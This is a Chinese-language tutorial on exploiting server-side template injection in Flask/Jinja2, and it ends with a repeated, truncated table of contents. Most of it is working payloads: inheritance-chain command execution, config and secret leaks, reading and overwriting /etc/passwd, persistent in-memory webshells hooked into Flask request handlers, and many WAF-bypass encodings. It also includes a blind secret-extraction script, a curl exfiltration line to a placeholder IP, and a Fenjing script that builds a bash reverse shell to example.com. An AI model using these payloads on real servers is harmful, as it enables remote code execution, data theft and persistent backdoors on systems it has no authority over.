Flask SSTI漏洞利用全面指南<\/h1>

背景介绍<\/h2>
SSTI（Server-Side Template Injection，服务端模板注入）发生在MVC框架的view层。当服务端接收用户输入并将其作为Web应用模板内容的一部分时，如果在目标编译渲染过程中执行了用户插入的恶意内容，就会导致敏感信息泄露、代码执行、GetShell等问题。<\/p>

基本利用流程<\/h2>

继承链流程<\/h3>
通过访问Python内部属性，获取可以执行命令的库和函数：<\/p>
获取实例对象的类<\/li>
获取该类的祖先类object<\/li>
获取object的子类<\/li>
选取__init__<\/code>为函数的类<\/li>
获取其__globals__<\/code>属性的__builtins__<\/code><\/li>
使用内置的类执行代码或导包后执行命令<\/li>
<\/ol>
Python内部关键属性<\/h3>

__class__<\/code> - 返回一个实例所属的类<\/li>
__mro__<\/code> - 查看类继承的所有父类，直到object<\/li>
__subclasses__()<\/code> - 获取一个类的子类，返回列表<\/li>
__bases__<\/code> - 返回一个类直接所继承的类（元组形式）<\/li>
__init__<\/code> - 类实例创建之后调用，对当前对象的实例进行初始化<\/li>
__globals__<\/code> - 返回当前空间下能使用的模块、方法和变量的字典<\/li>
__getattribute__<\/code> - 当类被调用时无条件进入此函数<\/li>
__getattr__<\/code> - 当对象中不存在的属性被调用时触发<\/li>
__dict__<\/code> - 返回所有属性，包括属性和方法<\/li>
__builtins__<\/code> - 包含当前所有导入的内建函数<\/li>
<\/ul>
获取object类<\/h2>
Python的object类是所有类的基类，可以通过以下方式访问：<\/p>
使用__mro__<\/code><\/h3>
().<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span>{}.<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span>[].<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>]  # python3<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>]  # python2<\/span>
<\/span><\/span><\/code><\/pre>使用__base__<\/code><\/h3>
().<\/span>__class__.<\/span>__base__
<\/span><\/span>{}.<\/span>__class__.<\/span>__base__
<\/span><\/span>[].<\/span>__class__.<\/span>__base__
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__base__  # python3<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__base__.<\/span>__base__  # python2<\/span>
<\/span><\/span><\/code><\/pre>使用__bases__<\/code><\/h3>
().<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>{}.<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>[].<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>]  # python3<\/span>
<\/span><\/span><\/code><\/pre>获取子类列表<\/h2>
通过object类的__subclasses__()<\/code>方法获取所有子类列表：<\/p>
().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()
<\/span><\/span><\/code><\/pre>查找可用的类（不带wrapper的__init__<\/code>函数）：<\/p>
l =<\/span> len([].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__())
<\/span><\/span>for<\/span> i in<\/span> range(l):
<\/span><\/span>    if<\/span> 'wrapper'<\/span> not<\/span> in<\/span> str([].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[i].<\/span>__init__):
<\/span><\/span>        print(i, [].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[i])
<\/span><\/span><\/code><\/pre>RCE常见利用方式<\/h2>
使用__builtins__<\/code><\/h3>
[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]('__import__("os").popen("ls").read()'<\/span>)
<\/span><\/span>[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['__import__'<\/span>]('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()
<\/span><\/span>[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['__import__'<\/span>]('platform'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>使用linecache<\/code><\/h3>
[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['linecache'<\/span>].<\/span>__dict__['os'<\/span>].<\/span>system('whoami'<\/span>)
<\/span><\/span>[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['linecache'<\/span>].<\/span>__dict__['sys'<\/span>].<\/span>modules['os'<\/span>].<\/span>system('whoami'<\/span>)
<\/span><\/span>[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['linecache'<\/span>].<\/span>__dict__['__builtins__'<\/span>]['__import__'<\/span>]('os'<\/span>).<\/span>system('ls'<\/span>)
<\/span><\/span><\/code><\/pre>使用sys<\/code><\/h3>
[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[58<\/span>].<\/span>__init__.<\/span>__globals__['sys'<\/span>].<\/span>modules['os'<\/span>].<\/span>system('whoami'<\/span>)
<\/span><\/span><\/code><\/pre>信息泄露<\/h2>
泄漏环境变量和配置<\/h3>
{{config}}
<\/span><\/span>{{self.<\/span>__dict__}}
<\/span><\/span>{{url_for.<\/span>__globals__['current_app'<\/span>].<\/span>config}}
<\/span><\/span>{{get_flashed_messages.<\/span>__globals__['current_app'<\/span>].<\/span>config}}
<\/span><\/span>{{get_flashed_messages.<\/span>__globals__['current_app'<\/span>].<\/span>config.<\/span>FLAG}}
<\/span><\/span>{{request.<\/span>application.<\/span>__self__.<\/span>_get_data_for_json.<\/span>__globals__['json'<\/span>].<\/span>JSONEncoder.<\/span>default.<\/span>__globals__['current_app'<\/span>].<\/span>config['FLAG'<\/span>]}}
<\/span><\/span>{{self}} ⇒<\/span> <<\/span>TemplateReference None<\/span>><\/span>
<\/span><\/span>{{self.<\/span>__dict__.<\/span>_TemplateReference__context.<\/span>config}}
<\/span><\/span>{{self.<\/span>__dict__.<\/span>_TemplateReference__context.<\/span>lipsum.<\/span>__globals__.<\/span>__builtins__.<\/span>open("\/flag"<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>文件操作<\/h2>
文件读取（Python2）<\/h3>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[40<\/span>]('\/etc\/passwd'<\/span>).<\/span>read()}}
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['file'<\/span>]('\/etc\/passwd'<\/span>).<\/span>read()}}
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['open'<\/span>]('\/etc\/passwd'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>文件读取（Python3）<\/h3>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[80<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['open'<\/span>]('\/etc\/passwd'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>文件写入（Python2）<\/h3>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[40<\/span>]('\/etc\/passwd'<\/span>,'w'<\/span>).<\/span>write('test'<\/span>)}}
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['file'<\/span>]('\/etc\/passwd'<\/span>,'w'<\/span>).<\/span>write('test'<\/span>)}}
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['open'<\/span>]('\/etc\/passwd'<\/span>,'w'<\/span>).<\/span>write('test'<\/span>)}}
<\/span><\/span><\/code><\/pre>内存马技术<\/h2>
add_url_rule<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("app.add_url_rule('\/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())"<\/span>,{'_request_ctx_stack'<\/span>:url_for.<\/span>__globals__['_request_ctx_stack'<\/span>],'app'<\/span>:url_for.<\/span>__globals__['current_app'<\/span>]})}}
<\/span><\/span><\/code><\/pre>before_request_funcs<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda+:__import__('os').popen('dir').read()"<\/span>)}}
<\/span><\/span><\/code><\/pre>after_request_funcs<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(<\/span>\"<\/span>global CmdResp;CmdResp=__import__(<\/span>\'<\/span>flask<\/span>\'<\/span>).make_response(__import__(<\/span>\'<\/span>os<\/span>\'<\/span>).popen(request.args.get(<\/span>\'<\/span>cmd<\/span>\'<\/span>)).read())<\/span>\"<\/span>)==None else resp)"<\/span>,{'request'<\/span>:url_for.<\/span>__globals__['request'<\/span>],'app'<\/span>:url_for.<\/span>__globals__['current_app'<\/span>]})}}
<\/span><\/span><\/code><\/pre>error_handler_spec<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>]["exec"<\/span>]("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('cmd')).read()"<\/span>)}}
<\/span><\/span><\/code><\/pre>WAF绕过技术<\/h2>
盲注技术<\/h3>
{%<\/span>for<\/span> char in<\/span> get_env(name=<\/span>"SECRET_KEY"<\/span>)%<\/span>}
<\/span><\/span>{%<\/span>if<\/span> char is<\/span> matching(''<\/span>) %<\/span>}1<\/span>
<\/span><\/span>{%<\/span>else<\/span>%<\/span>}0<\/span>
<\/span><\/span>{%<\/span>endif%<\/span>}
<\/span><\/span>{%<\/span>endfor%<\/span>}
<\/span><\/span><\/code><\/pre>示例脚本：<\/p>
import<\/span> string
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "https:\/\/ip:port\/"<\/span>
<\/span><\/span>s =<\/span> string.<\/span>printable
<\/span><\/span>
<\/span><\/span>def<\/span> ssti<\/span>(re):
<\/span><\/span>    payload =<\/span> """text={<\/span>%f<\/span>or<\/span>%20c<\/span>har<\/span>%20i<\/span>n<\/span>%20g<\/span>et_env(name="SECRET_KEY")%}{<\/span>%i<\/span>f<\/span>%20c<\/span>har<\/span>%20i<\/span>s%20matching('str')<\/span>%20%<\/span>}1{<\/span>%e<\/span>lse%}0{<\/span>%e<\/span>ndif%}{<\/span>%e<\/span>ndfor%}"""<\/span>.<\/span>replace("str"<\/span>, re)
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        "Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>
<\/span><\/span>    }
<\/span><\/span>    result =<\/span> requests.<\/span>post(url, data=<\/span>payload, headers=<\/span>headers, verify=<\/span>False<\/span>).<\/span>text
<\/span><\/span>    if<\/span> "1"<\/span> in<\/span> result:
<\/span><\/span>        print(re, result)
<\/span><\/span>        return<\/span> re
<\/span><\/span>    return<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> s:
<\/span><\/span>    time.<\/span>sleep(0.5<\/span>)
<\/span><\/span>    ssti(i)
<\/span><\/span><\/code><\/pre>Jinja2过滤器利用<\/h3>
attr过滤器<\/h4>
''<\/span>|<\/span>attr('__class__'<\/span>)  # 等价于 ''.__class__<\/span>
<\/span><\/span><\/code><\/pre>format过滤器<\/h4>
"<\/span>%c%c%c%c%c%c%c%c%c<\/span>"<\/span>|<\/span>format(95<\/span>,95<\/span>,99<\/span>,108<\/span>,97<\/span>,115<\/span>,115<\/span>,95<\/span>,95<\/span>)==<\/span>'__class__'<\/span>
<\/span><\/span><\/code><\/pre>first\/last\/random过滤器<\/h4>
|<\/span>last()  # 等价于 [-1]<\/span>
<\/span><\/span>|<\/span>first()  # 等价于 [0]<\/span>
<\/span><\/span>|<\/span>random()  # 随机选择<\/span>
<\/span><\/span><\/code><\/pre>join过滤器<\/h4>
{{[1<\/span>,2<\/span>,3<\/span>]|<\/span>join('|'<\/span>)}}  # 输出: 1|2|3<\/span>
<\/span><\/span>{{[1<\/span>,2<\/span>,3<\/span>]|<\/span>join}}  # 输出: 123<\/span>
<\/span><\/span><\/code><\/pre>lower过滤器<\/h4>
""<\/span>["__CLASS__"<\/span>|<\/span>lower]
<\/span><\/span><\/code><\/pre>replace\/reverse过滤器<\/h4>
'__claee__'<\/span>|<\/span>replace('ee'<\/span>,'ss'<\/span>)
<\/span><\/span>'__ssalc__'<\/span>|<\/span>reverse
<\/span><\/span><\/code><\/pre>string过滤器<\/h4>
().<\/span>__class__|<\/span>string  # 输出: <class 'tuple'><\/span>
<\/span><\/span>(().<\/span>__class__|<\/span>string)[0<\/span>]  # 输出: <<\/span>
<\/span><\/span>select()|<\/span>select|<\/span>string  # 输出: <generator object select_or_reject at 0x0000022717FF33C0><\/span>
<\/span><\/span><\/code><\/pre>关键词过滤绕过<\/h3>
字符串拼接<\/h4>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__buil'<\/span>+<\/span>'tins__'<\/span>]['__imp'<\/span>+<\/span>'ort__'<\/span>]('o'<\/span>+<\/span>'s'<\/span>).<\/span>popen('who'<\/span>+<\/span>'ami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>引号分割<\/h4>
{{''<\/span>['__class__'<\/span>].<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__bui''ltins__'<\/span>]['__impo''rt__'<\/span>]('o''s'<\/span>).<\/span>popen('who''ami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>__getattribute__<\/code>方法<\/h4>
''<\/span>.<\/span>__getattribute__('__class__'<\/span>)
<\/span><\/span><\/code><\/pre>切片操作<\/h4>
"__ssalc__"<\/span>[::-<\/span>1<\/span>]  # 反转字符串<\/span>
<\/span><\/span><\/code><\/pre>编码绕过<\/h3>
Base64（Python2）<\/h4>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['X19pbXBvcnRfXw=='<\/span>.<\/span>decode('base64'<\/span>)]('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>Unicode编码<\/h4>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['<\/span>\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f<\/span>'<\/span>]('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>16进制编码<\/h4>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['<\/span>\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f<\/span>'<\/span>]('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>8进制编码<\/h4>
{{''<\/span>['<\/span>\137\137\143\154\141\163\163\137\137<\/span>'<\/span>].<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['<\/span>\137\137\151\155\160\157\162\164\137\137<\/span>'<\/span>]('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>format格式化<\/h4>
"<\/span>{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}<\/span>"<\/span>.<\/span>format(95<\/span>,95<\/span>,99<\/span>,108<\/span>,97<\/span>,115<\/span>,115<\/span>,95<\/span>,95<\/span>)
<\/span><\/span><\/code><\/pre>chr函数<\/h4>
{%<\/span> set chr=<\/span>url_for.<\/span>__globals__['__builtins__'<\/span>].<\/span>chr %<\/span>}
<\/span><\/span>{{""<\/span>[chr(95<\/span>)%<\/span>2<\/span>bchr(95<\/span>)%<\/span>2<\/span>bchr(99<\/span>)%<\/span>2<\/span>bchr(108<\/span>)%<\/span>2<\/span>bchr(97<\/span>)%<\/span>2<\/span>bchr(115<\/span>)%<\/span>2<\/span>bchr(115<\/span>)%<\/span>2<\/span>bchr(95<\/span>)%<\/span>2<\/span>bchr(95<\/span>)]}}
<\/span><\/span><\/code><\/pre>~操作符<\/h4>
{%<\/span>set a=<\/span>'__cla'<\/span> %<\/span>}{%<\/span>set b=<\/span>'ss__'<\/span>%<\/span>}{{""<\/span>[a~<\/span>b]}}
<\/span><\/span><\/code><\/pre>大小写转换<\/h4>
''<\/span>['__CLASS__'<\/span>.<\/span>lower()]
<\/span><\/span><\/code><\/pre>中括号[]<\/code>过滤绕过<\/h3>
列表方法<\/h4>
list.<\/span>__getitem__(0<\/span>)
<\/span><\/span>list.<\/span>pop(0<\/span>)
<\/span><\/span><\/code><\/pre>字典方法<\/h4>
dict.<\/span>__getitem__('__builtins__'<\/span>)
<\/span><\/span>dict.<\/span>pop('__builtins__'<\/span>)
<\/span><\/span>dict.<\/span>get('__builtins__'<\/span>)
<\/span><\/span>dict.<\/span>setdefault('__builtins__'<\/span>)
<\/span><\/span><\/code><\/pre>示例<\/h4>
{{''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(1<\/span>).<\/span>__subclasses__().<\/span>__getitem__(139<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>__getitem__('__builtins__'<\/span>).<\/span>__getitem__('__import__'<\/span>)('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()}}
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>pop(1<\/span>).<\/span>__subclasses__().<\/span>pop(139<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>__getitem__('__builtins__'<\/span>).<\/span>__getitem__('__import__'<\/span>)('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>引号过滤绕过<\/h3>
使用request对象<\/h4>
{{[].<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>__import__(request.<\/span>args.<\/span>v1).<\/span>popen(request.<\/span>values.<\/span>v2).<\/span>read()}}&<\/span>v1=<\/span>os&<\/span>v2=<\/span>whoami
<\/span><\/span><\/code><\/pre>使用chr函数<\/h4>
{%<\/span> set chr=<\/span>().<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>chr%<\/span>}{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>__import__(chr(111<\/span>)%<\/span>2<\/span>Bchr(115<\/span>)).<\/span>popen(chr(119<\/span>)%<\/span>2<\/span>Bchr(104<\/span>)%<\/span>2<\/span>Bchr(111<\/span>)%<\/span>2<\/span>Bchr(97<\/span>)%<\/span>2<\/span>Bchr(109<\/span>)%<\/span>2<\/span>Bchr(105<\/span>)).<\/span>read()}}
<\/span><\/span><\/code><\/pre>点号.<\/code>过滤绕过<\/h3>
等价于__getattribute__<\/code>：<\/p>
''<\/span>.<\/span>__getattribute__('__class__'<\/span>)
<\/span><\/span><\/code><\/pre>或者使用中括号：<\/p>
{{''<\/span>['__class__'<\/span>]['__mro__'<\/span>][1<\/span>]['__subclasses__'<\/span>]()[139<\/span>]['__init__'<\/span>]['__globals__'<\/span>]['__builtins__'<\/span>]['eval'<\/span>](request.<\/span>args.<\/span>v1)}}
<\/span><\/span><\/code><\/pre>或者使用|attr<\/code>过滤器：<\/p>
{{()|<\/span>attr('__class__'<\/span>)|<\/span>attr('__base__'<\/span>)|<\/span>attr('__subclasses__'<\/span>)()|<\/span>attr('__getitem__'<\/span>)(139<\/span>)|<\/span>attr('__init__'<\/span>)|<\/span>attr('__globals__'<\/span>)|<\/span>attr('__getitem__'<\/span>)('__builtins__'<\/span>)|<\/span>attr('__getitem__'<\/span>)('eval'<\/span>)('__import__("os").popen("whoami").read()'<\/span>)}}
<\/span><\/span><\/code><\/pre>下划线_<\/code>过滤绕过<\/h3>
{{''<\/span>[request.<\/span>args.<\/span>v1][request.<\/span>args.<\/span>v2][1<\/span>][request.<\/span>args.<\/span>v3]()[139<\/span>][request.<\/span>args.<\/span>v4][request.<\/span>args.<\/span>v5][request.<\/span>args.<\/span>v6][request.<\/span>args.<\/span>v7](request.<\/span>args.<\/span>v8)}}&<\/span>v1=<\/span>__class__&<\/span>v2=<\/span>__mro__&<\/span>v3=<\/span>__subclasses__&<\/span>v4=<\/span>__init__&<\/span>v5=<\/span>__globals__&<\/span>v6=<\/span>__builtins__&<\/span>v7=<\/span>eval&<\/span>v8=<\/span>__import__("os"<\/span>).<\/span>popen("whoami"<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>双花括号{{}}<\/code>过滤绕过<\/h3>
使用if语句<\/h4>
{%<\/span> if<\/span> ''<\/span>.<\/span>__class__.<\/span>__base__.<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]('__import__("os").popen("curl http:\/\/xxx.xxx.xxx.xxx:12345\/?i=`whoami`").read()'<\/span>) %<\/span>}1<\/span>{%<\/span> endif %<\/span>}
<\/span><\/span><\/code><\/pre>使用print语句<\/h4>
{%<\/span> print(''<\/span>.<\/span>__class__.<\/span>__base__.<\/span>__subclasses__()[139<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]('__import__("os").popen("ls").read()'<\/span>)) %<\/span>}
<\/span><\/span><\/code><\/pre>长度限制绕过<\/h3>
{{url_for.<\/span>__globals__[request.<\/span>args.<\/span>a]}}
<\/span><\/span>{{lipsum.<\/span>__globals__.<\/span>os[request.<\/span>args.<\/span>a]}}
<\/span><\/span><\/code><\/pre>使用set语句更新config<\/h3>
{{config}}
<\/span><\/span>{%<\/span>set x=<\/span>config.<\/span>update(l=<\/span>lipsum)%<\/span>}
<\/span><\/span>{%<\/span>set x=<\/span>config.<\/span>update(u=<\/span>config.<\/span>update)%<\/span>}
<\/span><\/span>{%<\/span>set x=<\/span>config.<\/span>u(g=<\/span>request.<\/span>args.<\/span>a)%<\/span>}&<\/span>a=<\/span>__globals__
<\/span><\/span>{%<\/span>set x=<\/span>config.<\/span>u(o=<\/span>lipsum[config.<\/span>g].<\/span>os)%<\/span>}
<\/span><\/span>{%<\/span>set x=<\/span>config.<\/span>u(f=<\/span>config.<\/span>l[config.<\/span>g])%<\/span>}
<\/span><\/span>{{config.<\/span>f.<\/span>os.<\/span>popen('cat \/f*'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>自动化工具<\/h2>
推荐使用Fenjing工具进行自动化绕过：<\/p>
fenjing webui
<\/span><\/span>fenjing scan --url 'http:\/\/xxxx:xxx'<\/span>
<\/span><\/span><\/code><\/pre>示例Python脚本：<\/p>
from<\/span> fenjing import<\/span> exec_cmd_payload, config_payload
<\/span><\/span>import<\/span> logging
<\/span><\/span>logging.<\/span>basicConfig(level =<\/span> logging.<\/span>INFO)
<\/span><\/span>
<\/span><\/span>def<\/span> waf<\/span>(s: str):
<\/span><\/span>    blacklist =<\/span> [
<\/span><\/span>        "config"<\/span>, "self"<\/span>, "g"<\/span>, "os"<\/span>, "class"<\/span>, "length"<\/span>, "mro"<\/span>, "base"<\/span>, "lipsum"<\/span>,
<\/span><\/span>        "["<\/span>, '"'<\/span>, "'"<\/span>, "_"<\/span>, "."<\/span>, "+"<\/span>, "~"<\/span>, "{{"<\/span>,
<\/span><\/span>        "0"<\/span>, "1"<\/span>, "2"<\/span>, "3"<\/span>, "4"<\/span>, "5"<\/span>, "6"<\/span>, "7"<\/span>, "8"<\/span>, "9"<\/span>,
<\/span><\/span>        "０"<\/span>,"１"<\/span>,"２"<\/span>,"３"<\/span>,"４"<\/span>,"５"<\/span>,"６"<\/span>,"７"<\/span>,"８"<\/span>,"９"<\/span>
<\/span><\/span>    ]
<\/span><\/span>    return<\/span> all(word in<\/span> s for<\/span> word in<\/span> blacklist)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    shell_payload, _ =<\/span> exec_cmd_payload(waf, "bash -c <\/span>\"<\/span>bash -i >& \/dev\/tcp\/example.com\/3456 0>&1<\/span>\"<\/span>"<\/span>)
<\/span><\/span>    config_payload =<\/span> config_payload(waf)
<\/span><\/span>
<\/span><\/span>    print(f<\/span>"<\/span>{<\/span>shell_payload=}<\/span>"<\/span>)
<\/span><\/span>    print(f<\/span>"<\/span>{<\/span>config_payload=}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>总结<\/h2>
Flask SSTI漏洞利用的关键在于理解Python的对象继承链和属性访问机制，以及Jinja2模板引擎的特性。通过灵活运用各种绕过技术，可以在不同的WAF防护场景下实现代码执行。在实际渗透测试中，建议先手动测试基本利用方式，遇到防护时再逐步尝试各种绕过技术，最后可以考虑使用自动化工具提高效率。<\/p>
Flask SSTI漏洞利用全面指南<\/h1>

基本利用流程<\/h2>

获取object类<\/h2> Python的object类是所有类的基类，可以通过以下方式访问：<\/p>

RCE常见利用方式<\/h2>

信息泄露<\/h2>

文件操作<\/h2>

内存马技术<\/h2>

WAF绕过技术<\/h2>

Jinja2过滤器利用<\/h3>

关键词过滤绕过<\/h3>

编码绕过<\/h3>

引号过滤绕过<\/h3>

获取object类<\/h2>
Python的object类是所有类的基类，可以通过以下方式访问：<\/p>
